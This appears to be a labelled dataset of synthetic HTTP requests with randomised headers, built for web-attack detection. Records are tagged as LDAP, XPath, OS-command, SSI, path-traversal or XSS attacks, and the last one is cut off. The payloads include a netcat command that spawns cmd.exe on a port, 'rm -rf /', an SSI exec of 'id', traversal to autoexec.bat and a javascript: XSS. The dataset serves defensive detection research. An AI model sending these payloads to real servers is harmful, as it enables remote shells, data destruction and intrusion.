Cache-Control: max-stale
Client-ip: 128.51.142.118
Cookie: 6oane=ef1_NvnJGK
Cookie2: $Version="7"
Date: Mon, 09 Aug 04 24:10:11 CET
ETag: "4k2b-aFzaYNwu5THDb"
Expect: gtmnl0e=x4oheja
From: uiaeltm@8ehtblt.biz
If-Modified-Since: Mon, 22 May 06 14:29:25 CET
If-Unmodified-Since: Sat, 01 Jan 05 17:36:33 CET
If-Match: *
If-None-Match: "PrDDuqcxo03A.BA0"
If-Range: Mon, 06 Oct 08 14:30:20 UTC
Max-Forwards: 940
MIME-Version: 6.7
Pragma: o='arb'
Proxy-Authorization: gJons gtoaie=6vpernh8
Authorization: NTLM MmRpa29lbHJldUhzYW95aHJvbW5lcXJudGF4SWRlYWtpaWVPSGhsdXI2
Range: -9900
Referer: http://www.ihal7.ch/yapdiur/elit/ahle9t/nnR8gN2/sXdon2e.gz
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/6.2 (Machintosh; U; PPC 4.5; ed-eo; rv:8.7.0) Gecko/69859909
UA-CPU: PowerPC
UA-Disp: 084,5683,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 279x772
Via: HTTP/4.5 www.TssWz.tiff:645, HTTP/3.6 25.172.71.120, 8.7 4.202.76.11
Transfer-Encoding: gzip
Upgrade: wyme/7.1
X-Forwarded-For: 142.88.116.166
X-Serial-Number: 597498125488079
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43594
Start - Id: 37135
class: LdapInjection
GET /htnR157/KGjFB_/e7-7/3i/tds/gz6ij@/sito69oG/p8O1neZm.jpg?c1talilhr=mtaS%29%28%26%28objectClass%3D++++dhct*%29&maai=duevSaIa43yvdb2&edekzwiAeo=uaanhNiEjCee1Nmeni&ltneuWllsit8uta=yCea&shhastr8es=kRVDWz.6pCkk&ejcodqjlxieo=46874 HTTP/1.0
Host: 27.150.209.52
Connection: close
Accept: application/*;q=0.7
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: ee=wa
Client-ip: 251.5.13.242
Cookie: foeruiemeanank=32957;-N8RnOgJU=1goOi
Cookie2: $Version="74"
Date: Mon, 24 Apr 06 12:09:13 GMT
ETag: "omsqKnISdrLKr-1_"
Expect: seeuhtcr
From: ke6iat@otEmem.org
If-Modified-Since: Thu, 04 Dec 08 09:58:00 CET
If-Unmodified-Since: Tue, 29 Jun 04 15:43:21 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8
MIME-Version: 8.7
Pragma: aefnttep=u
Proxy-Authorization: NTLM d2FvU3JvaXRDZGNlSWhlbk9wRWVjdGJlb2hrcmVjZWQ=
Authorization: y9ce mwiri0s=oayAEdre
Range: -972338,855782-
Referer: http://www.eT0knu.st/nbehoals/to8eniwe.cgi
TE: trailers,deflate;q=0.3
Trailer: Accept-Language
User-Agent: Mozilla/4.0 (Windows; U; Win 9x 6.8; pB-0I; rv:9.9.2) Gecko/24391003
UA-CPU: 68000
UA-Disp: 529,581,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 617x3755
Via: 3.5 www.ibmt0eie.tiff
Transfer-Encoding: ftla; cmoSv=zluh
Upgrade: oEAO/0.4, NrmE/9.1, 2tirU/3.2, dprdqi/9.1, ejn2sn/3.5
Warning: 068 www.caus6t.html:451 "nAiwBaHg" 
X-Forwarded-For: 84.40.27.181
X-Serial-Number: 4738976742686812
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37135
Start - Id: 49158
class: XPathInjection
GET /S7iSotl0h4tNHnesee9/qv5wqk6Fb45g2Y/J6hbetweenvbscriptm/wgpAQ/n8.K_mo9K-/netcatNupdateSBrsock_streamzNqHXRcatiframe/afRaXHU/h.lPQid4HxWqHL7/eQLbuOBtrygEC-/t6asms1tie7tnty/Ede97tplos.htm?eeRj=s6ursc%27++or+sTid0r%2Fnl%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D421%5D+++++or+++%27smtsat1%27++%3D%27 HTTP/1.0
Host: 131.8.254.245
Connection: olnisE
Accept: audio/basic, image/gif
Accept-Charset: x-mac-chinesesimp, windows-1253;q=0.7, cp-932, iso-8859-5, x-mac-hebrew
Accept-Encoding: *
Accept-Language: af4-rtm, yuB-deisxio;q=0.8, masnpy-wntitd, iweh-tOsomhcb;q=0.1, ebgAs-xdmue
Cache-Control: max-stale=033
Client-ip: 38.175.250.11
Cookie: nledc=96;hle=io96RU95j
Cookie2: $Version="585"
Date: Sat, 22 Oct 05 20:46:45 GMT
ETag: "JRiumqeHdoOse.-"
Expect: 100-continue
From: esgt1xrh@tidc.com
If-Modified-Since: Sun, 19 Sep 04 14:57:59 CET
If-Unmodified-Since: Sun, 12 Dec 04 22:21:01 UTC
If-Match: "0RYhKtFgl@DG.dlBDTr"
If-None-Match: "uLyRHl6Vyb3jBji5ZbXM"
If-Range: Thu, 05 Apr 07 18:36:57 CET
Max-Forwards: 870
MIME-Version: 5.8
Pragma: tlh='eeWzpu'
Proxy-Authorization: Digest opaque="Mpzdea"
Authorization: Basic ZUV1ZGdudGU6c29vbw==
Range: -441207,31726-,-3
Referer: http://www.f1BOey.fr/fTR6b7/w3nwu/etzgel.php3
TE: trailers
Trailer: Pragma
User-Agent: dScwh2E5oomt
UA-CPU: StrongARM
UA-Disp: 8001,6616,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 7758x5013
Via: 9.7 125.174.187.210, 0.0 187.20.15.221
Transfer-Encoding: compress
Upgrade: rMm/8.7
Warning: 291 113.152.215.252 "6unhh" "Fri, 21 Oct 05 09:21:56 GMT"
X-Forwarded-For: 162.244.173.223
X-Serial-Number: 017399203750342
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49158
Start - Id: 36923
class: LdapInjection
PUT /eN/efQu5dDv_bAktZ/sNMG3UMBvcam9.yD8n/hwLvRb3DLzPuh/aOcm52U8b5/v__Vi.PtnvmlqOA/sH.j/5BvLcc2cEMbW/eR/f2/2c-pVYHBxG272.js? HTTP/1.0
Content-Length: 318
Content-Language: p
Content-Encoding: gzip
Content-Location: /rdrr/xbOttg/Aere5ewd/arsi.jpg
Content-MD5: eGRzYWhyYW4xeWlsYzQ5RQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 16 Dec 09 03:05:51 UTC
Last-Modified: Mon, 06 Sep 04 09:27:29 GMT
Host: www.Otnlrms.st
Connection: keep-alive
Accept: application/*, image/jpeg;q=0.6, text/*;q=0.3
Accept-Charset: *
Accept-Encoding: *
Accept-Language: dsovkehd-n;q=0.3, gt3-Ntqm, srg-8hH, ws4-9e5er
Cache-Control: a='Dii'
Client-ip: 23.24.154.22
Cookie: demOoomh=h@bEREJD;eeh2c=93;QrBnys=crrphap~&is;ha0duria67i=O4aeformAr;toErAefla=[r2uiuit
Cookie2: $Version="08"
Date: Fri, 03 Jun 05 01:07:45 GMT
ETag: W/"d7Bmeqt30DrvtRfk"
Expect: 100-continue
From: dhafadn@folsiatle.com
If-Modified-Since: Fri, 01 Dec 06 22:26:15 CET
If-Unmodified-Since: Fri, 17 Nov 06 08:17:43 GMT
If-Match: *
If-None-Match: "DU4x.HM2gYYPDUH2eZbK"
If-Range: Fri, 14 Mar 08 10:30:46 GMT
Max-Forwards: 1144
MIME-Version: 5.9
Pragma: OecrGjt=kae9ne
Proxy-Authorization: NTLM cmVlZXRyZWdpYWJlb3N0ZUFPdGd6bm85Ym5jbndpdG5jc2Vxc2J1YVNlcg==
Authorization: NTLM YnVPMHZlRGxpaHRjaXNhVHJMOHRvdmVuZXNybjJjaW90aXRvbDZ3aGVldWRZdA==
Range: 31-,450738-9829
Referer: http://www.ctoyrih.st/dHUQOpS/cto3/Xmeth9/cr6o.mp3
TE: chunked,chunked;q=0.4,trailers
Trailer: Accept
User-Agent: jrnyIehiraeth
UA-CPU: Sparc
UA-Disp: 0609,6015,16
UA-OS: Win98
UA-Pixels: 015x0585
Via: 3.0 128.168.94.165, FTP/6.3 138.250.39.41
Transfer-Encoding: gzip
Upgrade: ejsf/1.7, lxAe/6.8, 3Tuete/5.0
Warning: 591 www.lalfoh.gif "ed6niocL" "Fri, 23 Feb 07 23:24:32 CET"
X-Forwarded-For: 189.182.231.41
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

fTcrZtgrikdtij=eestatSlopl&aLYatwe5=@=imgfilohavingTnmi$f&dww=e&r5aIaeH2nay=xns5o)(&(objectClass  =   wEc*)&nbbaesoZeya=aestnr&sciimnptmee4Rs=rtrrsss1 d sgttewt1t&cadfgx=600&nph-3qI-j@=oTnn&input0CvdZQ4dj=upd24hd1u&klibNB=rS&tl=710&eateee=truNa&IuEJexec5=rautoexectx&wTezttauogxpod=nhoelpassthrue;l

End - Id: 36923
Start - Id: 48339
class: XPathInjection
GET /n9a6yUe4C2_zn/irO3dOij/hZcLbD0v/Rnn/gzjS6V-sqtcHf/lASpasswd99rG-B6.php?apeo6tA=Xousj%284nd4ecatEheu&sTtjo=112&xtermwaUUs@=tupdatehtpassEnph-regcTconnectsamh2&psetouhssDoCtsr=0ifreze2ws5ho&0apasswdLr0khtpassZ5child=onyNpetC&eatr9ieo2=haupdaterosA%3Dexd1&aioanpEewedln=tmsahiud&h5l=4 HTTP/1.0
Host: 181.84.122.204
Connection: nebot0E
Accept: */*;q=0.3
Accept-Charset: shift_jis;q=0.9, x-mac-korean;q=0.4, x-mac-japanese;q=0.1
Accept-Encoding: *
Accept-Language: s-tiget4a4;q=0.2, g-el8ah;q=0.8, i-Eliex, n-Tnqa9zot
Cache-Control: only-if-cached
Client-ip: 200.211.226.108
Cookie: ieoaRstwDai=eunion g @;httpQ8t5Kprocessing-instructionOscriptQ=eus;e9mF=oqenocaIn7oincludeh1 psystem/e;eaensimcseesg=aAv
Cookie2: $Version="50"
Date: Fri, 18 Jan 08 19:14:00 UTC
ETag: W/"imjZvWN0w46MgICT"
Expect: 100-continue
From: eubmr8po@lWep.cz
If-Modified-Since: Mon, 09 Jan 06 10:32:56 CET
If-Unmodified-Since: Thu, 30 Jun 05 13:35:54 UTC
If-Match: *
If-None-Match: "gLAXQmijNbpR3aS"
If-Range: Sun, 21 May 06 01:46:14 UTC
Max-Forwards: 0905
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: Basic QXRkbXJhbjU6bnRvdA==
Authorization: amois 8RrOiykl=stajd
Range: -77,51989-199599,0752-
Referer: /N6ifHy/2sA4.asmx
TE: trailers,deflate;q=0.9,trailers
Trailer: If-None-Match
User-Agent: 2wh2ie/cOs/fas/child::node()[  position()=290]     |  oir/attt/fla9/child::text()[position()=7]    or   'heb'  =    '
UA-CPU: Sparc
UA-Disp: 202,739,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 433x249
Via: IsOdp/6.5 11.80.71.36, HTTP/8.3 www.msZQ.js, 2.6 229.188.64.74:8
Transfer-Encoding: gzip
Upgrade: nhogo/6.4
Warning: 936 www.ew9sLHSe.html "otReepcbaeheiessidy" "Tue, 04 May 10 22:09:47 UTC"
X-Forwarded-For: 162.179.117.235
X-Serial-Number: 6875195
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48339
Start - Id: 42849
class: OsCommanding
GET /kcsofupe/ioR2nsmhriesositeb/juLugX305v4Xp/slRVu68nK@R/nebeH7/atS/ez1R1m/kcLuA/g2nceru/elnEa.sh?mrt5teesyo=405&dt7N=60&16ierite=344&mQ9v2O2B_PZl=%7C+++++shell%28+++++%22cmd+%2Fc++++c%3AInetpubwwwrootMSISSnc.exe+++-l+++++-p+++5658++-t+++++-e++++cmd.exe++++%22%29+%7C++++%27&cnomMdHz5cs0ow=eYe5N7-b&tnh=0126&UunionxwhereNvarMCXi=0623286&paebaf=38628409&WAK8eH=yA7 HTTP/1.0
Host: 168.253.80.114:33508
Connection: bfiqnDaf
Accept: text/html;q=0.4, text/plain;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: f6s=madro
Client-ip: 143.230.118.47
Cookie: 8AOopenaphpm89=(uthc wt3I4e;IkUgklU0=1;hh7s8=tLc;bdntnoen8cigs6e=28;pasze6thgnewns=948383
Cookie2: $Version="840"
Date: Tue, 20 Jan 04 08:11:37 UTC
ETag: W/"olCrtg5FxsS-VvM"
Expect: 100-continue
From: l6tz5hd@ruglhe.be
If-Modified-Since: Wed, 22 Oct 08 08:12:22 CET
If-Unmodified-Since: Sun, 02 Aug 09 08:17:36 CET
If-Match: "APn_FheDimUModWFJ"
If-None-Match: "Z6GEjEtI2dmmmnOy10A"
If-Range: "ZiEy-bnA8m1M4OmNB"
Max-Forwards: 47
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: njdei gtdN=st7gs
Authorization: ashu aliHe=hEgi
Range: -885,-18051
Referer: http://www.sh5tfTga.it/humiao/dooab.jsp
TE: trailers,gzip;q=0.4,trailers
Trailer: Transfer-Encoding
User-Agent: Tohqndn (evwBkkx; eVb-baEm; iCbz1n)
UA-CPU: Sparc
UA-Disp: 7817,3346,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 625x3364
Via: FTP/7.3 www.onsrvbas.css, dmbi/0.3 205.62.119.228, FTP/9.8 www.2sg8sjo.html
Transfer-Encoding: ehlbn8
Upgrade: Rhetio/0.3, d5nIg/4.3
Warning: 831 253.234.94.229 "urhmxsr8a0ucgtYcTaym" "Thu, 10 Mar 05 12:24:31 GMT"
X-Forwarded-For: 209.98.157.41
X-Serial-Number: 646833
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42849
Start - Id: 39147
class: SSI
GET /khne15h4ldia47eavBsd/y2AnDuYSJPJTDb.aspx?za4CsgGe=t58ZQb-Rdyar&JKHy=676523&he=2854077 HTTP/1.1
Host: 14.164.128.149:80
Connection: close
Accept: audio/*;q=0.9, image/*, video/*;q=0.7
Accept-Charset: *;q=0.7
Accept-Language: oe9-r, eoern-n9st
Cookie: fqtzOV0connectincludeF=autoexecefweedsnntav
Date: Tue, 25 Sep 07 15:18:49 GMT
ETag: W/"ryIO9NjxUEWI_lEU"
If-Modified-Since: Tue, 13 Apr 04 03:24:56 UTC
If-Unmodified-Since: Wed, 18 Oct 06 21:28:05 CET
Max-Forwards: 4
Referer: /painbie9/ststna.mpeg
User-Agent: <!-- #exec  cgi="/cgi-bin/script?rL"   -->
Via: 5.3 239.146.13.152
Transfer-Encoding: identity
Upgrade: sgee1/0.9

null

End - Id: 39147
Start - Id: 45731
class: PathTransversal
GET /het4ostp/oiinnThekhdlosza.cfm?rty=tvB&6serviceshttpQ=Rmsylcnhqmlt0fs&sshigi=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&t8=75574580&mtmriagh48Ld=3009748&5wOGyYxa=ht&tdKk=ea0heiellrecTsiyzq&shtacces3mqobjecttof77B=nripFr1sroeGgPor&qlttcewtngiTo=hyspieet%2FZgroup+byL&Vji60s=u%3Bkconnectq7tcdllc&n9cienheOpcr=%27%7E&rxksabtmYittro=080 HTTP/1.0
Host: 30.49.22.178
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-turkish, x-mac-roman, x-mac-hebrew, x-mac-chinesetrad, windows-1255
Accept-Encoding: *
Accept-Language: t-hno, 9-o, tnmse-ned, 4sTtfap-t, pshbsL-aMceeht;q=0.1
Cache-Control: no-transform
Client-ip: 195.187.195.167
Cookie: wm=ehttps$o0
Cookie2: $Version="66"
Date: Mon, 27 Jul 09 08:07:34 GMT
ETag: W/"ZuZLKP3v5YD1lYXEqcG"
Expect: twlia9=reoe
From: 9e6jh@oniedt.gov
If-Modified-Since: Sun, 01 Jun 08 02:42:53 CET
If-Unmodified-Since: Fri, 28 Dec 07 20:53:53 CET
If-Match: "zV-@oqkVqR8x0SaT1"
If-None-Match: *
If-Range: Mon, 02 Aug 04 06:18:04 CET
Max-Forwards: 17
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: swjmRp fzc3=EdDtese
Authorization: Basic YTF0YmdGdjpoc211dA==
Range: -500252,934-3694
Referer: /ewWaGsz/Peih22ga/8vlte.jpg
TE: chunked;q=0.2,trailers,trailers
Trailer: Via
User-Agent: Mozilla/4.6 (compatible; lmEi; Windows NT; tEs8dJh)
UA-CPU: Sparc
UA-Disp: 664,891,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 979x8035
Via: 8.2 234.125.69.23, 0.5 www.cne4s4.html
Transfer-Encoding: compress
Upgrade: eebc/8.1, RfQc/0.5, iec/8.3
Warning: 139 123.133.191.85 "aoRovfiyaetlwhiotHa" "Tue, 27 Apr 10 21:16:33 GMT"
X-Forwarded-For: 199.93.92.127
X-Serial-Number: 1618317
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45731
Start - Id: 46662
class: XSS
GET /Taus/MKE@bXswHYi3/2YBauEO/Hp5M5h/ND1xnJhFOd@ZGor-/ajreal4t3ne/lihiaHpoirm.htm?oia=2895150&oniiaiilfFddtdd=8 HTTP/1.1
Host: 193.81.83.2
Connection: keep-alive
Accept: application/x-tar;q=0.9, video/*;q=0.9
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.8
Accept-Language: malhsI-tnetml5n, fNceong-0eda;q=0.9
Cache-Control: min-fresh=424
Client-ip: 88.188.34.246
Cookie: p6as=4inEpsc;a7ido=<img  src    = "   javascript:[alert ('liy2S9y');]    " >;zc.4=y.G;hdnmrneozra0e0a=i@usfa[;4ttvolfhrqjdad9=he5kceeatl
Cookie2: $Version="94"
Date: Sat, 05 Dec 09 16:01:29 CET
ETag: "ZcBYuNRFhVisIsE"
Expect: niet0idA=tgesrYs
From: os7ddt@2hedt3.cz
If-Modified-Since: Wed, 28 Nov 07 17:33:23 UTC
If-Unmodified-Since: Sun, 26 Aug 07 13:52:45 GMT
If-Match: "GI4a2zcjJzYcLPs"
If-None-Match: *
If-Range: *
Max-Forwards: 301
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: Digest nc=BdfD5Ba4
Authorization: sslavT a5ErOh3=aken
Range: -345631
Referer: /rDens.jsp
TE: gzip;q=0.1,gzip;q=0.2,chunked;q=0.8
Trailer: If-Modified-Since
User-Agent: oaRana97R/3.8
UA-CPU: PowerPC
UA-OS: WinNT
UA-Color: color16
Via: ysj/5.7 79.31.52.228, nst/7.2 113.2.89.28, FTP/5.7 182.235.18.242:59392
Transfer-Encoding: deflate
Upgrade: 0hi/0.1, sdpair/3.6
Warning: 212 www.ee2Ee.js "iuaewa4tc" 
X-Forwarded-For: 216.174.136.108
X-Serial-Number: 64753281
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46662
Start - Id: 40107
class: SSI
GET /rL0xbinlselectI-jDiu/5Xbetween84hiDnMbHallC/i2Eterweg/eNnFpbSOi@eVq.css?epte=%3C%21+++++%23%3C%21--+%23exec++cmd%3D%22id%22--%3E HTTP/1.0
Host: www.unrar.be:80
Connection: close
Accept: */*
Accept-Charset: windows-874;q=0.2, ks_c_5601-1987, x-mac-roman;q=0.9, isiri-3342;q=0.2, iso-8859-6;q=0.7
Accept-Encoding: 
Accept-Language: lnercH-sshNwn;q=0.7
Cache-Control: max-age=3
Client-ip: 173.159.194.156
Cookie: Bnnycepnl=3Oriakhpec3b;garcxeeL=ow739Ss1oy
Cookie2: $Version="674"
Date: Fri, 11 Nov 05 22:05:52 UTC
ETag: W/"aBKdxlbr.ECzHxyEdr"
Expect: 100-continue
From: ihPoede@2hepettfu.be
If-Modified-Since: Mon, 06 Aug 07 24:54:10 GMT
If-Unmodified-Since: Thu, 17 Nov 05 07:52:05 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 10 Jan 05 02:28:29 UTC
Max-Forwards: 9987
MIME-Version: 0.3
Pragma: mnwL='x'
Proxy-Authorization: rxlppx muowon6=meWd
Authorization: Basic amVUbmU6dGVncmhy
Range: 12545-4
Referer: http://D2tat.ch/eLTsdcr2/Haietbgy/hnsk/mpppyiw.pdf
TE: deflate
Trailer: Proxy-Authorization
User-Agent: ouI74m.9 http://www.Scainl.gov
UA-CPU: 68000
UA-Disp: 952,4343,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 6612x3935
Via: la2u/1.6 www.rfprsI.jpg
Transfer-Encoding: hsnne
Upgrade: uts3/8.2, hd4uvh/2.4, a6sol/2.3, yce/9.7, cnsH/1.9
Warning: 525 47.98.135.216 "dlaiinerst" 
X-Forwarded-For: 241.68.225.159
X-Serial-Number: 606454137105
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40107
Start - Id: 43552
class: OsCommanding
GET /pQXQWq/dnatfysVJEj/g4Yrcerhhoim/wcdDUFOs-6Yo0mficXtc/HN/6wdkDItFOxp_2@Z/dSay2Z1Py9-D/dBMj-EaPVDBsHlsVh/nQlhP.gif?lehr=wG.&s6Hw2Zn55a=%60+rm++-rf+%2F+%60&gdmyaA=oejTu&AenlloaMneeRi=4257&sino2nenb=3658&fsnbenhnUoEoif=eis&g112freplaceGqc7Rq=394231125&wnMsyxf=4096574936&manatAead=aTrtl1oS+bue%28ts%3D3+&styleWhAGN3N_=zr%29s-&zckCrKBD=ccn&ehr4t=+nph-adminiframe HTTP/1.1
Host: www.tEincjsen.st:9182
Connection: keep-alive
Accept: audio/*, application/*;q=0.9, application/zip;q=0.7
Accept-Charset: euc-jp;q=0.1, iso-8859-7;q=0.8
Accept-Encoding: 
Accept-Language: 7isrci-arrtyf, riFkdrcs-g, hewku-wNt
Cache-Control: max-stale
Client-ip: 214.70.1.175
Cookie: ro2a05tejMk=iR;we2=ya0enAef7awsfSe;me=a1EmNmeestaaS;nn0=33347;dVnEvH54NI8=eoaoeAtsideolmee
Cookie2: $Version="425"
Date: Sun, 25 Mar 07 08:48:12 UTC
ETag: "60KWnTBuO0WR3pn7X4Yx"
Expect: 100-continue
From: dtl4i@ydc3.de
If-Modified-Since: Fri, 29 Jul 05 08:43:10 GMT
If-Unmodified-Since: Sun, 20 Apr 08 06:36:28 GMT
If-Match: "vH1Hi_cI1ycrJGuSZqP"
If-None-Match: "0o@td3910LiAdDqVZWwA"
If-Range: Thu, 13 Dec 07 06:52:24 CET
Max-Forwards: 29
MIME-Version: 7.0
Pragma: SRbdEojh='dtoobay'
Proxy-Authorization: NTLM YmxvNHRwYW5pdHhhdTNhaGhpY3R0ZGg5c2luUm5kczVlZElzYWE=
Authorization: Digest username="eup1n"
Range: 510-
Referer: /qdnmrnb/caytsb9/aahoiR/itee/zyiaterR.jpeg
TE: chunked;q=0.5,deflate,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/0.8 (Machintosh; U; Mac OS X 8.6; 7d-yQ; rv:9.9.8) Gecko/51561068
UA-CPU: x86
UA-Disp: 484,9177,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 199x6158
Via: 1.0 www.AntEao.html:48
Transfer-Encoding: gzip
Upgrade: enmNoI/8.6, ddyoo/5.6
Warning: 755 www.rpcofa7.png "taotesry9p" 
X-Forwarded-For: 92.181.164.255
X-Serial-Number: 36797879465846791
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43552
Start - Id: 50028
class: XPathInjection
PUT /igkmh1sGV5ZYWypD/pUZx-Tj2O@5/q6c.asp? HTTP/1.1
Content-Length: 252
Content-Language: oea,5ooce
Content-Encoding: gzip
Content-Location: http://telmorys.ch/derae.asmx
Content-MD5: bmVyY2F0dW9ycnJoZXRsdA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 12 Mar 09 05:28:50 CET
Last-Modified: Tue, 30 Dec 08 06:40:51 CET
Host: www.06pt7e4LoP.de:77080
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: compress, compress, gzip, identity;q=0.3, compress;q=0.4
Accept-Language: *
Cache-Control: no-transform
Client-ip: 111.28.164.122
Cookie: nii= 92;nnm2a9ia=liba;e4=lvarne;vrsdyt=a35scriptalhaevrkocg]aniposition;samOf8=7s5sln-\tetbfteTeyhtpass;etipuaxnIk0avd=2
Cookie2: $Version="41"
Date: Wed, 05 Jan 05 02:19:43 GMT
Expect: 3edmta6m
From: nedh@e0uheaoepd.com
If-Modified-Since: Fri, 11 Jan 08 01:04:23 UTC
If-Unmodified-Since: Wed, 01 Mar 06 12:12:13 CET
If-Match: "gj-B.6huX2MYH8m"
If-None-Match: *
If-Range: Thu, 11 Sep 08 10:43:27 CET
Max-Forwards: 7
Proxy-Authorization: Basic bm9ldzhpdTpuaHRubw==
Authorization: Digest username="1oupNa6o"
Range: 8-710
Referer: /aMizxee/pFodTb/rnvaif/eEDaD.tiff
TE: trailers
User-Agent: lon4ryu'  or  1< Loa/en/l/child::text()[position()=160] or     'uimit'=  '
UA-CPU: StrongARM
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 412x6538
Via: FTP/2.1 www.urtrtS.png, 3.4 185.51.60.13:2, 3.9 www.hamtonze.gif
Transfer-Encoding: deflate
Upgrade: odsrn/7.3, noifE/8.7
Warning: 364 www.snye8.shtml "eosaaz" 
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

ZeD9.@19u@copyB=eo&lEahnocelmoip=3185580&eetae=nstl5shrorrai&Y9HimglIGZd=sta4skeeEaNdrax&ahstynhecgas=oe%3E&l@JZVexecaccess_log-7Pt=documentopie-elmoOrne&s%uWJ=o9&ant=72&tfinda=106821&geegL3ds=itrhi+he&rn=as%40%40IaCb2&wwinnthtpassVS4ysa=uob6liIsPdkto6

End - Id: 50028
Start - Id: 38570
class: LdapInjection
GET /ubIZLPborLy/uzNo0xEyfjtMd9/z551E8xy8V/w5eTe1dtsHd/yEKYVRo_1/eehUuqarnlfilt/eonaPT-hPCFRYubF/e1XUT/mBl8w/tn.jpg?pvlRi=yia%29%28%26%28objectClass+++%3D+25S*%29&rnyox=t4tlhae&on4bih3=4245&sdteis6toetlv=525144&aiolishlo=97910&ge1c0=4799787&le5iursl2daTe=89&rieww=021&a7ncubnhmt=htdlH HTTP/1.0
Host: 228.42.162.103:80
Connection: keep-alive
Accept: image/jpeg
Accept-Charset: iso-8859-3;q=0.7, euc-jp, x-mac-hebrew, euc-kr;q=0.9, windows-1257;q=0.5
Accept-Encoding: 
Accept-Language: ruP-u5ymzdc;q=0.9
Cache-Control: max-age=925
Client-ip: 231.216.109.79
Cookie: HmettO=675
Cookie2: $Version="987"
Date: Thu, 21 Feb 08 13:10:01 UTC
ETag: "Xn6bLNl6HcqYn2A"
Expect: UpT3s
From: rdtaepw@enuD8ssxt.biz
If-Modified-Since: Thu, 08 Sep 05 08:25:03 GMT
If-Unmodified-Since: Sun, 15 Jun 08 21:21:23 CET
If-Match: *
If-None-Match: "_af5P7W.tvMhgTB8m"
If-Range: "i77PH7Bjn25NOQMj"
Max-Forwards: 7861
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Basic bGVhY286c3RvcnNz
Authorization: Digest algorithm=MD5
Range: -5
Referer: /barlLte.mpeg
TE: trailers,trailers,gzip
Trailer: If-Range
User-Agent: nbhopow/5.1
UA-CPU: PowerPC
UA-Disp: 9162,3647,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 233x5921
Via: FTP/7.5 www.Hs1bnaoz.png, 6.9 www.rteytli.html
Transfer-Encoding: identity
Upgrade: lur6/3.4, nvm8re/2.6, Eprm6t/6.4, uoTtdn/4.6, loebeG/0.7
Warning: 149 www.memO4ih.js "gsEeeekriesa" "Mon, 30 Nov 09 07:31:03 GMT"
X-Forwarded-For: 157.225.217.71
X-Serial-Number: 0288802054604644545
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38570
Start - Id: 39309
class: SSI
GET /pyy9r/aiOxmTwIhH@kPpEUAnK.php?js3ihnns=%3C%21--%23email+fromhost%3D%22www.tlzassH.com%22+tohost%3D%22mailbox.iha.com%22+message%3D%22fsrmv+tun3Yu+vSeO3eT+Dglxos%22+fromaddress%3D%22egEcq.com%22+toaddress%3D%22zgs.dthibw.com%22+subject%3D%22ht%22+sender%3D%22no.com%22+replyto%3D%22aajsoyk.com%22+cc%3D%22oze%22+inreplyto%3D%22iGtt+pte+Sitw%22+id%3D%22ce6hrmail%22+--%3E&in6=laeut40sNssorPund&W2=noduseoform+rshutdown&ntisqtc7cn1teug=ectth&GKrvart.ApositionaB@=mczf&ndryckeitEoS=idectelnetX+r&aarkemo=zoth&p55iobgju=mieaeoU76&eytilniahes=ad%3C&AlaeiD=santTeocme6irrte HTTP/1.1
Host: www.edo0s.biz
Connection: ugul
Accept: audio/*
Accept-Charset: *
Accept-Encoding: compress;q=0.0, gzip, deflate, gzip;q=0.6
Accept-Language: a5iev9to-uTitdt;q=0.2, oI-netwdca, tt-eq
Cache-Control: no-store
Client-ip: 85.124.56.90
Cookie: OLGdeleted=essvntn;OvCVFPTXexecin=ocscript-v;ehs=ttl
Cookie2: $Version="93"
Date: Sun, 07 Oct 07 20:13:11 UTC
ETag: "1pA1U.J7IAhA3yekD"
Expect: niMp
From: l2mr@a6ldiT.ch
If-Modified-Since: Thu, 06 Jan 05 15:11:47 UTC
If-Unmodified-Since: Thu, 26 Jun 08 24:11:01 GMT
If-Match: *
If-None-Match: *
